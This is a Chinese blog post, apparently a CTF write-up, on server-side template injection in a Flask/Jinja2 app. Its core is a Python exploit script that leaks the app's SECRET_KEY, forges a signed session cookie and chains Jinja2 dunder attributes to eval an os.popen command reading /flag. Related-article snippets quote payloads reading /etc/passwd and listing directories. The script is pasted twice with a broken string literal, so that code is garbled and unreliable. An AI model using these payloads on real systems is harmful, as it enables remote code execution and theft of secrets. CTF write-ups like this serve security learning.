CTF-web-ssti模板注入漏洞

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量921 收藏 8
点赞数 28
分类专栏: CTF 文章标签: 安全架构 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJQ946/article/details/137501126
版权
  1. SSTI模版注入:

             模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。

    模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。

            SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。

            漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内  容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

  2. php常见的模板:twig,smarty,blade,等

  3. python常见的模板有:Jinja2,tornado 
    __dict__   :保存类实例或对象实例的属性变量键值对字典
__class__  :返回一个实例所属的类
__mro__    :返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__bases__  :以元组形式返回一个类直接所继承的类(可以理解为直接父类)__base__   :和上面的bases大概相同,都是返回当前类所继承的类,即基类,区别是base返回单个,bases返回是元组
// __base__和__mro__都是用来寻找基类的
__subclasses__  :以列表返回类的子类
__init__   :类的初始化方法
__globals__     :对包含函数全局变量的字典的引用__builtin__&&__builtins__  :python中可以直接运行一些函数,例如int(),list()等等。                  这些函数可以在__builtin__可以查到。查看的方法是dir(__builtins__)                  在py3中__builtin__被换成了builtin                  1.在主模块main中,__builtins__是对内建模块__builtin__本身的引用,即__builtins__完全等价于__builtin__。                  2.非主模块main中,__builtins__仅是对__builtin__.__dict__的引用,而非__builtin__本身
  4. 题目描述:
  5. 打开题目链接,尝试查看源代码的js文件寻找漏洞,发现没有什么线索
  6. 打开题目的附件,发现一个基于 Flask 的简单 Web 应用程序

    这段代码是一个基于 Flask 的简单 Web 应用程序,用于演示 SSTI(Server-Side Template Injection,服务端模板注入)漏洞。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。

    在这个应用中,index.html 模板页面通过 render_template 函数动态渲染,而 user() 路由接受 username 参数,然后将其作为模板字符串渲染返回。在 waf() 函数中,存在一个基本的简单黑名单过滤器,用于检查输入中是否包含某些敏感字符串,如果包含则拒绝渲染并返回提示信息 "No hacker"。

    这段代码与 SSTI 漏洞相关的地方在于 user() 路由中,它直接将用户输入作为模板字符串进行渲染,而没有对输入进行适当的过滤或验证。这意味着如果用户能够控制 username 参数,并成功注入模板代码,就可以执行任意的 Python 代码,包括读取服务器上的文件、执行系统命令等危险操作。

    例如,如果用户输入 {{ 7 * 7 }},那么页面上就会显示 49;如果用户输入 {{ ''.__class__.__mro__[1].__subclasses__() }},则可能会返回服务器上 Python 的所有子类,包括敏感信息。攻击者可以使用这种漏洞进行进一步的渗透攻击。

  7. 分析代码发现没有过滤config和session,所以可以采用session来获得任意字符串 
    # coding=utf-8
import sys
import requests
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

# 获取目标 URL,这里假设通过命令行参数传入
url = sys.argv[1]  # "import sys
import requests
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

# 获取目标 URL,这里假设通过命令行参数传入
url = sys.argv[1]  # "http://X.X.X.X:port/"

# 发送 GET 请求到目标网站的 'user' 路由,以获取 SECRET_KEY
# 这里利用了之前的 SSTI 漏洞,将恶意模板作为用户名参数传递
sk = requests.get(f"{url}user", params={"username": "{{config.SECRET_KEY}}"}).text

# 创建 Flask 应用
app = Flask(__name__)
# 将获取到的 SECRET_KEY 设置为 Flask 应用的密钥
app.secret_key = sk
# 获取 Flask 应用的会话序列化器
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

# 定义一个用于构造恶意会话的函数
def index():
    # 构造恶意的 Python 字典,包含一些特殊的变量名和属性名,以及一条命令用于执行系统命令获取 '/flag' 文件内容
    a = {
        "cs": "__class__",
        "bs": "__base__",
        "sub": "__subclasses__",
        "num": 190,
        "it": "__init__",
        "gb": "__globals__",
        "bt": "__builtins__",
        "el": "eval",
        "cmd": "__import__('os').popen('cut -d \"\" -f1 /flag').read()"
    }
    # 序列化恶意字典并返回
    return session_serializer.dumps(a)

# 构造恶意会话
session = index()
# 构造包含恶意会话的 Cookie
cookie = {"session": session}

# 发送 GET 请求到 'user' 路由,触发 SSTI 漏洞,并执行恶意的系统命令获取 '/flag' 文件内容
response = requests.get(
    f"{url}user",
    params={
        # 利用 SSTI 漏洞执行恶意模板代码
        "username": "{{(joiner[session.cs]|attr(session.bs))[session.sub]()"
                    "[session.num][session.it][session.gb][session.bt][session.el](session.cmd)}}"
    },
    cookies=cookie
)

# 打印获取的结果
print(response.text)

# 发送 GET 请求到目标网站的 'user' 路由,以获取 SECRET_KEY
# 这里利用了之前的 SSTI 漏洞,将恶意模板作为用户名参数传递
sk = requests.get(f"{url}user", params={"username": "{{config.SECRET_KEY}}"}).text

# 创建 Flask 应用
app = Flask(__name__)
# 将获取到的 SECRET_KEY 设置为 Flask 应用的密钥
app.secret_key = sk
# 获取 Flask 应用的会话序列化器
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

# 定义一个用于构造恶意会话的函数
def index():
    # 构造恶意的 Python 字典,包含一些特殊的变量名和属性名,以及一条命令用于执行系统命令获取 '/flag' 文件内容
    a = {
        "cs": "__class__",
        "bs": "__base__",
        "sub": "__subclasses__",
        "num": 190,
        "it": "__init__",
        "gb": "__globals__",
        "bt": "__builtins__",
        "el": "eval",
        "cmd": "__import__('os').popen('cut -d \"\" -f1 /flag').read()"
    }
    # 序列化恶意字典并返回
    return session_serializer.dumps(a)

# 构造恶意会话
session = index()
# 构造包含恶意会话的 Cookie
cookie = {"session": session}

# 发送 GET 请求到 'user' 路由,触发 SSTI 漏洞,并执行恶意的系统命令获取 '/flag' 文件内容
response = requests.get(
    f"{url}user",
    params={
        # 利用 SSTI 漏洞执行恶意模板代码
        "username": "{{(joiner[session.cs]|attr(session.bs))[session.sub]()"
                    "[session.num][session.it][session.gb][session.bt][session.el](session.cmd)}}"
    },
    cookies=cookie
)

# 打印获取的结果
print(response.text)
  8. 需要在运行时通过命令行参数指定目标 URL 
    python code.py http://target-url.com/

  9. 若以上内容分析有误,请博友们指出

  10. 更多ssti例子见:https://www.cnblogs.com/bmjoker/p/13508538.html

ye^o^
关注
  • 28
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 5344
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
SSTI(模板注入)漏洞利用
Ciyaso的博客
07-15 618
读写文件 读文件: 方法一 ''.__class__.__mro__[2].__subclasses__()[166].__init__.__globals__['__builtins__']['file']('/etc/passwd').read() 方法二: [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() 写文件换为 .write() 即可。 写文件: 方法一: ''.__class__.__mro__[2].__su
渗透学习-23- WEB 攻防-Python 考点&CTF 与 CMS-SSTI 模版注入&PYC 反编译
最新发布
2301_76268112的博客
05-02 34
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1233
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 882
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入点python21.2.3.4.5.6.python31.2.
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 306
SSTI
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-web学习大纲
01-30
CTF-web学习大纲
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 478
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
CTF模板注入
weixin_43952190的博客
07-30 4192
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
SSTI模板注入-中括号、args、单双引号被过滤绕过(ctfshow web入门365)
T1ngSh0w的博客
03-28 1655
SSTI模板注入漏洞——中括号、单双引号、args被过滤。 ctfshow web入门365
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5762
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
模板注入 [WesternCTF2018]shrine1
m0_75178803的博客
02-23 394
发现注册了一个名为FLAG的config,这里可能有flag,通过url_for()与globals()函数,绕过黑名单。输入shrine/{{7*7}}验证成功。存在flask-jinja2模板注入,发现了current_app()函数。查看这个里面的config。
CTF之Simple_SSTI_1和Simple_SSTI_2
qq_74263993的博客
04-05 294
flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../../').read() }}flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}flag={{config}}就得到了flag。第一题第二题都一样,都是简单的SSTI漏洞,这里告诉我们传入的参数是flag。然后一个一个目录查看发现flag有关信息在app目录下。
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado
qq_43564182的博客
07-04 432
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado 文章目录CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado解题网页中出现cookie: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210704232702503.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5499
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值